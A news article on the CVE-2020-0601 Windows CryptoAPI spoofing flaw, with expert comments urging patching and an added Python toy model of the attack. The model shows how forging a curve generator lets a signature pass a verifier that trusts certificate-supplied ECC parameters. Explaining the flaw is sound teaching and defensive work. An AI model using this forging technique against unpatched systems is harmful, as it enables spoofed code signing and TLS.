It is now confirmed that Microsoft's Patch Tuesday release yesterday includes a fix for a spoofing vulnerability in the Windows CryptoAPI library (Crypt32.dll), CVE-2020-0601, as reported in SC Media UK (see original story below). The flaw lies in the way the library validates Elliptic Curve Cryptography (ECC) certificates: when matching a certificate chain against a trusted ECC root, Windows compared the public key but did not verify that the curve parameters carried in the certificate (in particular the generator point) were those of the trusted root. An attacker can therefore choose a private key, derive a generator under which the trusted root's public key becomes their own, and sign certificates, executables or TLS handshakes that an unpatched verifier accepts as chaining to that root. Once the January update is installed, Windows writes Event ID 1 from the source Microsoft-Windows-Audit-CVE to the Application event log when it encounters a certificate that attempts to exploit this flaw, which gives defenders a simple post-patch detection check.
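To make the parameter-confusion flaw concrete, the following is an added, self-contained Python model; it is not code from the article, from Microsoft or from any exploit, and it uses the genuine NIST P-256 constants with a toy affine ECDSA written for clarity rather than speed. The attacker step is the generator derivation G' = d'^-1 · Q in forge_parameters; the two verify calls in demo stand in for a verifier that trusts certificate-supplied curve parameters and one that insists on the trusted root's own curve. Function names, the q_root key and the signed blob are constructed for illustration.

```python
"""Toy model of the CVE-2020-0601 ECC parameter-confusion flaw (pure Python)."""
import hashlib
import secrets

# NIST P-256 domain parameters (genuine constants, FIPS 186-4 / SEC 2).
P = 0xffffffff00000001000000000000000000000000ffffffffffffffffffffffff
A = P - 3
B = 0x5ac635d8aa3a93e7b3ebbd55769886bc651d06b0cc53b0f63bce3c3e27d2604b
N = 0xffffffff00000000ffffffffffffffffbce6faada7179e84f3b9cac2fc632551
G = (0x6b17d1f2e12c4247f8bce6e563a440f277037d812deb33a0f4a13945d898c296,
     0x4fe342e2fe1a7f9b8ee7eb4a7c0f9e162bce33576b315ececbb6406837bf51f5)


def _inv(x, m):
    return pow(x, -1, m)


def _add(p1, p2):
    """Affine point addition on P-256; None is the point at infinity."""
    if p1 is None:
        return p2
    if p2 is None:
        return p1
    x1, y1 = p1
    x2, y2 = p2
    if x1 == x2:
        if (y1 + y2) % P == 0:
            return None
        lam = (3 * x1 * x1 + A) * _inv(2 * y1, P) % P
    else:
        lam = (y2 - y1) * _inv(x2 - x1, P) % P
    x3 = (lam * lam - x1 - x2) % P
    return (x3, (lam * (x1 - x3) - y1) % P)


def _mul(k, point):
    """Double-and-add scalar multiplication (not constant time; demo only)."""
    result = None
    while k:
        if k & 1:
            result = _add(result, point)
        point = _add(point, point)
        k >>= 1
    return result


def _hash_to_int(msg):
    return int.from_bytes(hashlib.sha256(msg).digest(), "big") % N


def keygen(gen=G):
    d = secrets.randbelow(N - 1) + 1
    return d, _mul(d, gen)


def sign(d, msg, gen=G):
    """ECDSA over generator 'gen' (a certificate can carry its own 'gen')."""
    z = _hash_to_int(msg)
    while True:
        k = secrets.randbelow(N - 1) + 1
        r = _mul(k, gen)[0] % N
        s = _inv(k, N) * (z + r * d) % N
        if r and s:
            return r, s


def verify(pub, msg, sig, gen=G):
    """ECDSA verify; 'gen' is whatever generator the verifier decides to trust."""
    r, s = sig
    if not (0 < r < N and 0 < s < N):
        return False
    z = _hash_to_int(msg)
    w = _inv(s, N)
    x = _add(_mul(z * w % N, gen), _mul(r * w % N, pub))
    return x is not None and x[0] % N == r


def forge_parameters(victim_pub):
    """The CVE-2020-0601 trick: pick any private key d' and set G' = d'^-1 * Q.
    Then d' * G' == Q, so the trusted root's public key is 'ours' under G'."""
    d_evil = secrets.randbelow(N - 1) + 1
    return d_evil, _mul(_inv(d_evil, N), victim_pub)


def demo():
    """Returns (accepted_by_vulnerable_verifier, accepted_by_fixed_verifier)."""
    _, q_root = keygen()                       # trusted ECC root; its private key is unknown to us
    d_evil, g_evil = forge_parameters(q_root)
    assert _mul(d_evil, g_evil) == q_root      # same public point, different parameters
    blob = b"constructed sample: payload.exe"  # constructed stand-in for a signed binary
    sig = sign(d_evil, blob, gen=g_evil)
    vulnerable = verify(q_root, blob, sig, gen=g_evil)  # trusts cert-supplied G'
    fixed = verify(q_root, blob, sig, gen=G)            # uses the root's real curve
    return vulnerable, fixed


if __name__ == "__main__":
    print(demo())
```

The only difference between the two verify calls is which generator the verifier uses; that is exactly the check the patched Crypt32.dll adds. Note that the attacker never learns the root's private key and never breaks ECDSA itself, which is why no key rotation was needed, only the patch.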
In an email to SC Media UK, Allan Liska, senior solutions architect at Recorded Future, comments: "While it was initially reported that this was solely a Windows 10 vulnerability, the vulnerability exists in both Windows 10 and Windows Server 2016 and 2019. This vulnerability could allow an attacker to spoof the certificates used to sign Windows applications. This in turn would allow malicious software to run even in environments that are heavily controlled and use application whitelisting for added layers of security."
Liska also describes reports that the vulnerability was reported by the NSA to Microsoft as ".... a good demonstration of the role the NSA, and other security agencies, can play in improving global information security. This reporting is also likely a direct result of the revamped Vulnerability Equities Process (VEP) at NSA. The goal of the revamped programme is to prioritise public interest in reporting security flaws and protecting core systems and infrastructure. Certificate signing is critical to the trust of software applications in both the public and private sectors, so this reporting certainly meets the 'critical' threshold. It is worth noting that, at this time, we do not know how long the NSA has had knowledge of this vulnerability."
Microsoft fixed 50 vulnerabilities in this first Patch Tuesday of 2020.
Praise for the NSA's actions also came from Chris Morales, head of security analytics at Vectra, who adds: "Kudos to the NSA for informing Microsoft and to Microsoft for quickly reacting.
"I’d be interested to understand what makes this exploit worth reporting to Microsoft instead of keeping for their personal arsenal as they have in the past. It could be because many of those previous tools leaked and have caused widespread damage across multiple organisations. It could be because there was a concern others would find this vulnerability themselves and it was dangerous enough to warrant remediation instead of weaponising. Or it just could be the NSA already has enough other methods for compromising a Windows system and doesn’t need it."
Defenders are reminded again of the importance of patching this vulnerability, and of how to prioritise it, with Tim Mackey, principal security strategist within the Synopsys CyRC (Cybersecurity Research Center), saying: "There are times when it’s reasonable to defer a patch, but deferring the patch for CVE-2020-0601 isn’t one of them. ... Exploitation of this vulnerability will allow an attacker to bypass the trust of all network connections on Windows 10 and Windows Server 2016/2019 systems, or those referencing them.
"With the attention CVE-2020-0601 is receiving, attackers will be crafting their attacks with an eye to profiting from those who lag in their patch procedures. Priority should be placed on patching any Windows device connected to the internet, or fulfilling a network service function like DNS, web proxy, VPN server, domain controllers or systems validating trust. As with any vulnerability, if the system is used by a privileged user, then timely application of patches is critical. In the case of CVE-2020-0601, priority should be placed on patching any system used by a privileged user or by a user with access to sensitive data."
Jonathan Knudsen, senior security strategist at Synopsys, adds a warning saying: "Legitimate developers can cryptographically sign their software, which proves its legitimacy to users at installation time. The vulnerability in crypt32.dll, a fundamental component of Windows, enables an attacker to supply malware that appears to be legitimate. This means that users can unwittingly install bad software even when they are relying on the code signing mechanism to give them assurance of its safety. If you don’t update, attackers are able to exploit these vulnerabilities to steal information or take control of your systems. Many organisations are reluctant to update as soon as patches are available because of the risk of losing functionality. Each organisation must find the line that balances the risk of breakage against the risk of attackers exploiting a vulnerability."
Original story below:
According to numerous sources, the upcoming Microsoft Windows patch should be applied immediately to fix an as-yet unconfirmed but serious vulnerability.
Veteran researcher Brian Krebs posted a blog outlining some of the rumours, focussing on a flaw in ‘a core cryptographic component present in all versions of Windows.’ According to Krebs' sources, the vulnerability concerns a Windows component known as crypt32.dll, a Windows module that Microsoft says handles "certificate and cryptographic messaging functions in the CryptoAPI."
This component includes functionality for signing, encrypting and decrypting data using digital certificates, which if compromised could have serious ramifications for authentication on Windows desktops and servers, sensitive data handled by the Internet Explorer and Edge browsers, and a host of associated applications and services.
Security researcher Will Dormann responded to the rumours with a tweet suggesting that "people should perhaps pay very close attention" to the upcoming patch, a sentiment echoed by Professor Alan Woodward in a later tweet.
I get the impression that people should perhaps pay very close attention to installing tomorrow's Microsoft Patch Tuesday updates in a timely manner. Even more so than others.— Will Dormann (@wdormann) 13 January 2020
I don't know... just call it a hunch?
Pay attention to Patch Tuesday from Microsoft today. This is not going to be one to defer. Don’t panic, just patch.— Alan Woodward (@ProfWoodward) January 14, 2020
Javvad Mallik, security awareness advocate at KnowBe4, further echoed the ‘don’t panic, just patch’ mantra, commenting to SC Media UK: "All software regularly has vulnerabilities and other issues discovered, which is why vendors release patches on a frequent basis to address these. Microsoft is no different in that regard.
However, with the large footprint Microsoft has, any major issues can impact organisations of all sizes across all verticals. The upcoming patch is rumoured to be addressing a major vulnerability. It's important therefore for organisations to prioritise the patch and ensure their systems are protected as soon as possible.
Ultimately, this should be treated like any other patch, prioritised and applied in accordance with its severity. There is no need to panic, just follow standard procedures and patch."
David Kennefick, product architect at edgescan, also advocated perspective, while emphasising the importance of updating patching policies: "There is little known about the first Windows patch of 2020, other than Twitter folks are saying we should pay attention to it. This is not uncommon, and the uncertainty is making people jump to the conclusion that this is another Shellshock (CVE-2014-6271) or Heartbleed (CVE-2014-0160).
"It is very likely not, but the hype that it is attracting is good, it makes organisations realise the importance of patching and ask the question as to the status of their current patching policies.
"If this vulnerability is as bad as speculated, there should be an immediate revision of patching policies to make sure the organisation is covered as soon as possible," he concluded.